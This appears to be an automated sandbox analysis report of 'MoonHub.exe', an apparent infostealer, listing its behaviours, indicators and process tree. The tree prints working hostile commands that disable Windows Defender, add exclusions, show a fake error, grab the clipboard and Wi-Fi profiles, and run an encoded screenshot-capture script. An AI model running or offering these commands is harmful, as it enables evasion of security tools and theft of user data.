Analysis
-
max time kernel
433s -
max time network
438s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
05-01-2025 20:50
Behavioral task
behavioral1
Sample
MoonHub.exe
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
MoonHub.exe
Resource
win10v2004-20241007-en
General
-
Target
MoonHub.exe
-
Size
5.9MB
-
MD5
c7dae29a10828c9a72dc7879af402c66
-
SHA1
05d3d8fb1b82ea331e435f71673374d2ddde718e
-
SHA256
c92388b5e5b9fe1c2ceb2aa4dc83be92299a02406e69a0422dce2b1f5228902a
-
SHA512
d9eb90c9faca70e3ff81b03d5ba142124c30469aecefa32c03481109a86929ee9844303e08b9edb0e67040d6f1d7a1fe8ea96129c52a19acdf1cb55a4699b85d
-
SSDEEP
98304:3IdIu4+DcdbOamaHl3Ne4i3gDUZnhhM7M+yvFaW9cIzaF6ARwDtyDe2H7MEU3QMj:Bp+DmbXeNoInY7/sHfbRy9wEAH1Yg
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3040 powershell.exe 3560 powershell.exe 1348 powershell.exe 2720 powershell.exe 4104 powershell.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts MoonHub.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 1100 powershell.exe 4640 cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 1972 rar.exe -
Loads dropped DLL 17 IoCs
pid Process 1960 MoonHub.exe 1960 MoonHub.exe 1960 MoonHub.exe 1960 MoonHub.exe 1960 MoonHub.exe 1960 MoonHub.exe 1960 MoonHub.exe 1960 MoonHub.exe 1960 MoonHub.exe 1960 MoonHub.exe 1960 MoonHub.exe 1960 MoonHub.exe 1960 MoonHub.exe 1960 MoonHub.exe 1960 MoonHub.exe 1960 MoonHub.exe 1960 MoonHub.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 24 discord.com 25 discord.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 11 ip-api.com 19 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 5 IoCs
pid Process 4904 tasklist.exe 2396 tasklist.exe 4524 tasklist.exe 1432 tasklist.exe 1560 tasklist.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
pid Process 4592 cmd.exe -
resource yara_rule behavioral2/files/0x0007000000023ca2-21.dat upx behavioral2/memory/1960-25-0x00007FF955690000-0x00007FF955AFE000-memory.dmp upx behavioral2/files/0x0007000000023c97-41.dat upx behavioral2/files/0x0007000000023c9c-46.dat upx behavioral2/memory/1960-48-0x00007FF96DF30000-0x00007FF96DF3F000-memory.dmp upx behavioral2/memory/1960-47-0x00007FF967EB0000-0x00007FF967ED4000-memory.dmp upx behavioral2/files/0x0007000000023c9b-45.dat upx behavioral2/files/0x0007000000023c9a-44.dat upx behavioral2/files/0x0007000000023c99-43.dat upx behavioral2/files/0x0007000000023c98-42.dat upx behavioral2/files/0x0007000000023c96-40.dat upx behavioral2/files/0x0007000000023ca7-38.dat upx behavioral2/files/0x0007000000023ca6-37.dat upx behavioral2/files/0x0007000000023ca5-36.dat upx behavioral2/files/0x0007000000023c94-39.dat upx behavioral2/files/0x0007000000023ca1-33.dat upx behavioral2/files/0x0007000000023c9f-32.dat upx behavioral2/files/0x0007000000023c95-28.dat upx behavioral2/files/0x0007000000023ca0-30.dat upx behavioral2/memory/1960-54-0x00007FF964B20000-0x00007FF964B4D000-memory.dmp upx behavioral2/memory/1960-56-0x00007FF9640D0000-0x00007FF9640E9000-memory.dmp upx behavioral2/memory/1960-58-0x00007FF9640B0000-0x00007FF9640CF000-memory.dmp upx behavioral2/memory/1960-60-0x00007FF955330000-0x00007FF955499000-memory.dmp upx behavioral2/memory/1960-62-0x00007FF963E20000-0x00007FF963E39000-memory.dmp upx behavioral2/memory/1960-66-0x00007FF963DF0000-0x00007FF963E1E000-memory.dmp upx behavioral2/memory/1960-64-0x00007FF964B10000-0x00007FF964B1D000-memory.dmp upx behavioral2/memory/1960-72-0x00007FF955270000-0x00007FF955328000-memory.dmp upx behavioral2/memory/1960-71-0x00007FF967EB0000-0x00007FF967ED4000-memory.dmp upx behavioral2/memory/1960-74-0x00007FF954EF0000-0x00007FF955265000-memory.dmp upx behavioral2/memory/1960-78-0x00007FF964390000-0x00007FF96439D000-memory.dmp upx behavioral2/memory/1960-77-0x00007FF963DD0000-0x00007FF963DE4000-memory.dmp upx behavioral2/memory/1960-70-0x00007FF955690000-0x00007FF955AFE000-memory.dmp upx behavioral2/memory/1960-81-0x00007FF954650000-0x00007FF954768000-memory.dmp upx behavioral2/memory/1960-80-0x00007FF9640D0000-0x00007FF9640E9000-memory.dmp upx behavioral2/memory/1960-82-0x00007FF9640B0000-0x00007FF9640CF000-memory.dmp upx behavioral2/memory/1960-112-0x00007FF963E20000-0x00007FF963E39000-memory.dmp upx behavioral2/memory/1960-186-0x00007FF963DF0000-0x00007FF963E1E000-memory.dmp upx behavioral2/memory/1960-247-0x00007FF955270000-0x00007FF955328000-memory.dmp upx behavioral2/memory/1960-270-0x00007FF954EF0000-0x00007FF955265000-memory.dmp upx behavioral2/memory/1960-295-0x00007FF955330000-0x00007FF955499000-memory.dmp upx behavioral2/memory/1960-294-0x00007FF9640B0000-0x00007FF9640CF000-memory.dmp upx behavioral2/memory/1960-290-0x00007FF967EB0000-0x00007FF967ED4000-memory.dmp upx behavioral2/memory/1960-289-0x00007FF955690000-0x00007FF955AFE000-memory.dmp upx behavioral2/memory/1960-326-0x00007FF955690000-0x00007FF955AFE000-memory.dmp upx behavioral2/memory/1960-342-0x00007FF955690000-0x00007FF955AFE000-memory.dmp upx behavioral2/memory/1960-358-0x00007FF96DF30000-0x00007FF96DF3F000-memory.dmp upx behavioral2/memory/1960-359-0x00007FF964390000-0x00007FF96439D000-memory.dmp upx behavioral2/memory/1960-357-0x00007FF954EF0000-0x00007FF955265000-memory.dmp upx behavioral2/memory/1960-356-0x00007FF954650000-0x00007FF954768000-memory.dmp upx behavioral2/memory/1960-352-0x00007FF955270000-0x00007FF955328000-memory.dmp upx behavioral2/memory/1960-351-0x00007FF963DF0000-0x00007FF963E1E000-memory.dmp upx behavioral2/memory/1960-350-0x00007FF964B10000-0x00007FF964B1D000-memory.dmp upx behavioral2/memory/1960-349-0x00007FF963E20000-0x00007FF963E39000-memory.dmp upx behavioral2/memory/1960-348-0x00007FF955330000-0x00007FF955499000-memory.dmp upx behavioral2/memory/1960-347-0x00007FF9640B0000-0x00007FF9640CF000-memory.dmp upx behavioral2/memory/1960-346-0x00007FF9640D0000-0x00007FF9640E9000-memory.dmp upx behavioral2/memory/1960-345-0x00007FF964B20000-0x00007FF964B4D000-memory.dmp upx behavioral2/memory/1960-343-0x00007FF967EB0000-0x00007FF967ED4000-memory.dmp upx behavioral2/memory/1960-354-0x00007FF963DD0000-0x00007FF963DE4000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4644 cmd.exe 2248 PING.EXE -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 3052 cmd.exe 408 netsh.exe -
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2336 WMIC.exe 1712 WMIC.exe 3096 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 2252 systeminfo.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2248 PING.EXE -
Suspicious behavior: EnumeratesProcesses 20 IoCs
pid Process 3040 powershell.exe 1348 powershell.exe 3040 powershell.exe 1348 powershell.exe 3560 powershell.exe 3560 powershell.exe 1100 powershell.exe 1100 powershell.exe 1100 powershell.exe 1444 powershell.exe 1444 powershell.exe 1444 powershell.exe 2720 powershell.exe 2720 powershell.exe 2564 powershell.exe 2564 powershell.exe 4104 powershell.exe 4104 powershell.exe 1588 powershell.exe 1588 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3040 powershell.exe Token: SeIncreaseQuotaPrivilege 2824 WMIC.exe Token: SeSecurityPrivilege 2824 WMIC.exe Token: SeTakeOwnershipPrivilege 2824 WMIC.exe Token: SeLoadDriverPrivilege 2824 WMIC.exe Token: SeSystemProfilePrivilege 2824 WMIC.exe Token: SeSystemtimePrivilege 2824 WMIC.exe Token: SeProfSingleProcessPrivilege 2824 WMIC.exe Token: SeIncBasePriorityPrivilege 2824 WMIC.exe Token: SeCreatePagefilePrivilege 2824 WMIC.exe Token: SeBackupPrivilege 2824 WMIC.exe Token: SeRestorePrivilege 2824 WMIC.exe Token: SeShutdownPrivilege 2824 WMIC.exe Token: SeDebugPrivilege 2824 WMIC.exe Token: SeSystemEnvironmentPrivilege 2824 WMIC.exe Token: SeRemoteShutdownPrivilege 2824 WMIC.exe Token: SeUndockPrivilege 2824 WMIC.exe Token: SeManageVolumePrivilege 2824 WMIC.exe Token: 33 2824 WMIC.exe Token: 34 2824 WMIC.exe Token: 35 2824 WMIC.exe Token: 36 2824 WMIC.exe Token: SeDebugPrivilege 1560 tasklist.exe Token: SeIncreaseQuotaPrivilege 2824 WMIC.exe Token: SeSecurityPrivilege 2824 WMIC.exe Token: SeTakeOwnershipPrivilege 2824 WMIC.exe Token: SeLoadDriverPrivilege 2824 WMIC.exe Token: SeSystemProfilePrivilege 2824 WMIC.exe Token: SeSystemtimePrivilege 2824 WMIC.exe Token: SeProfSingleProcessPrivilege 2824 WMIC.exe Token: SeIncBasePriorityPrivilege 2824 WMIC.exe Token: SeCreatePagefilePrivilege 2824 WMIC.exe Token: SeBackupPrivilege 2824 WMIC.exe Token: SeRestorePrivilege 2824 WMIC.exe Token: SeShutdownPrivilege 2824 WMIC.exe Token: SeDebugPrivilege 2824 WMIC.exe Token: SeSystemEnvironmentPrivilege 2824 WMIC.exe Token: SeRemoteShutdownPrivilege 2824 WMIC.exe Token: SeUndockPrivilege 2824 WMIC.exe Token: SeManageVolumePrivilege 2824 WMIC.exe Token: 33 2824 WMIC.exe Token: 34 2824 WMIC.exe Token: 35 2824 WMIC.exe Token: 36 2824 WMIC.exe Token: SeDebugPrivilege 1348 powershell.exe Token: SeIncreaseQuotaPrivilege 2336 WMIC.exe Token: SeSecurityPrivilege 2336 WMIC.exe Token: SeTakeOwnershipPrivilege 2336 WMIC.exe Token: SeLoadDriverPrivilege 2336 WMIC.exe Token: SeSystemProfilePrivilege 2336 WMIC.exe Token: SeSystemtimePrivilege 2336 WMIC.exe Token: SeProfSingleProcessPrivilege 2336 WMIC.exe Token: SeIncBasePriorityPrivilege 2336 WMIC.exe Token: SeCreatePagefilePrivilege 2336 WMIC.exe Token: SeBackupPrivilege 2336 WMIC.exe Token: SeRestorePrivilege 2336 WMIC.exe Token: SeShutdownPrivilege 2336 WMIC.exe Token: SeDebugPrivilege 2336 WMIC.exe Token: SeSystemEnvironmentPrivilege 2336 WMIC.exe Token: SeRemoteShutdownPrivilege 2336 WMIC.exe Token: SeUndockPrivilege 2336 WMIC.exe Token: SeManageVolumePrivilege 2336 WMIC.exe Token: 33 2336 WMIC.exe Token: 34 2336 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2524 wrote to memory of 1960 2524 MoonHub.exe 83 PID 2524 wrote to memory of 1960 2524 MoonHub.exe 83 PID 1960 wrote to memory of 2644 1960 MoonHub.exe 84 PID 1960 wrote to memory of 2644 1960 MoonHub.exe 84 PID 1960 wrote to memory of 4644 1960 MoonHub.exe 85 PID 1960 wrote to memory of 4644 1960 MoonHub.exe 85 PID 1960 wrote to memory of 404 1960 MoonHub.exe 86 PID 1960 wrote to memory of 404 1960 MoonHub.exe 86 PID 1960 wrote to memory of 2096 1960 MoonHub.exe 89 PID 1960 wrote to memory of 2096 1960 MoonHub.exe 89 PID 1960 wrote to memory of 4848 1960 MoonHub.exe 92 PID 1960 wrote to memory of 4848 1960 MoonHub.exe 92 PID 2644 wrote to memory of 3040 2644 cmd.exe 94 PID 2644 wrote to memory of 3040 2644 cmd.exe 94 PID 4848 wrote to memory of 2824 4848 cmd.exe 95 PID 4848 wrote to memory of 2824 4848 cmd.exe 95 PID 2096 wrote to memory of 1560 2096 cmd.exe 96 PID 2096 wrote to memory of 1560 2096 cmd.exe 96 PID 4644 wrote to memory of 1348 4644 cmd.exe 97 PID 4644 wrote to memory of 1348 4644 cmd.exe 97 PID 404 wrote to memory of 2752 404 cmd.exe 98 PID 404 wrote to memory of 2752 404 cmd.exe 98 PID 1960 wrote to memory of 1844 1960 MoonHub.exe 100 PID 1960 wrote to memory of 1844 1960 MoonHub.exe 100 PID 1844 wrote to memory of 1760 1844 cmd.exe 175 PID 1844 wrote to memory of 1760 1844 cmd.exe 175 PID 1960 wrote to memory of 1444 1960 MoonHub.exe 149 PID 1960 wrote to memory of 1444 1960 MoonHub.exe 149 PID 1444 wrote to memory of 4020 1444 cmd.exe 105 PID 1444 wrote to memory of 4020 1444 cmd.exe 105 PID 1960 wrote to memory of 2584 1960 MoonHub.exe 106 PID 1960 wrote to memory of 2584 1960 MoonHub.exe 106 PID 2584 wrote to memory of 2336 2584 cmd.exe 108 PID 2584 wrote to memory of 2336 2584 cmd.exe 108 PID 1960 wrote to memory of 1436 1960 MoonHub.exe 174 PID 1960 wrote to memory of 1436 1960 MoonHub.exe 174 PID 1436 wrote to memory of 1712 1436 cmd.exe 111 PID 1436 wrote to memory of 1712 1436 cmd.exe 111 PID 1960 wrote to memory of 4592 1960 MoonHub.exe 112 PID 1960 wrote to memory of 4592 1960 MoonHub.exe 112 PID 1960 wrote to memory of 4252 1960 MoonHub.exe 113 PID 1960 wrote to memory of 4252 1960 MoonHub.exe 113 PID 4592 wrote to memory of 4920 4592 cmd.exe 177 PID 4592 wrote to memory of 4920 4592 cmd.exe 177 PID 4252 wrote to memory of 3560 4252 cmd.exe 117 PID 4252 wrote to memory of 3560 4252 cmd.exe 117 PID 1960 wrote to memory of 4964 1960 MoonHub.exe 118 PID 1960 wrote to memory of 4964 1960 MoonHub.exe 118 PID 1960 wrote to memory of 4880 1960 MoonHub.exe 119 PID 1960 wrote to memory of 4880 1960 MoonHub.exe 119 PID 4880 wrote to memory of 4904 4880 cmd.exe 122 PID 4880 wrote to memory of 4904 4880 cmd.exe 122 PID 4964 wrote to memory of 2396 4964 cmd.exe 123 PID 4964 wrote to memory of 2396 4964 cmd.exe 123 PID 1960 wrote to memory of 684 1960 MoonHub.exe 124 PID 1960 wrote to memory of 684 1960 MoonHub.exe 124 PID 1960 wrote to memory of 4640 1960 MoonHub.exe 125 PID 1960 wrote to memory of 4640 1960 MoonHub.exe 125 PID 1960 wrote to memory of 2640 1960 MoonHub.exe 127 PID 1960 wrote to memory of 2640 1960 MoonHub.exe 127 PID 1960 wrote to memory of 3636 1960 MoonHub.exe 129 PID 1960 wrote to memory of 3636 1960 MoonHub.exe 129 PID 2640 wrote to memory of 4524 2640 cmd.exe 132 PID 2640 wrote to memory of 4524 2640 cmd.exe 132 -
Views/modifies file attributes 1 TTPs 3 IoCs
pid Process 4920 attrib.exe 4632 attrib.exe 2824 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\MoonHub.exe"C:\Users\Admin\AppData\Local\Temp\MoonHub.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2524 -
C:\Users\Admin\AppData\Local\Temp\MoonHub.exe"C:\Users\Admin\AppData\Local\Temp\MoonHub.exe"2⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1960 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\MoonHub.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:2644 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\MoonHub.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3040
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:4644 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1348
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Not compatible with your windows version', 0, 'Error 4018', 0+16);close()""3⤵
- Suspicious use of WriteProcessMemory
PID:404 -
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Not compatible with your windows version', 0, 'Error 4018', 0+16);close()"4⤵PID:2752
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:2096 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1560
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
- Suspicious use of WriteProcessMemory
PID:4848 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2824
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"3⤵
- Suspicious use of WriteProcessMemory
PID:1844 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 24⤵PID:1760
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"3⤵
- Suspicious use of WriteProcessMemory
PID:1444 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 24⤵PID:4020
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:2584 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:2336
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:1436 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:1712
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\MoonHub.exe""3⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:4592 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Temp\MoonHub.exe"4⤵
- Views/modifies file attributes
PID:4920
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:4252 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3560
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4964 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:2396
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4880 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:4904
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵PID:684
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵PID:4980
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:4640 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:1100
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:2640 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:4524
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:3636
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:5060
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:3052 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:408
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:1120
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:2252
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵PID:1472
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵PID:2696
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANA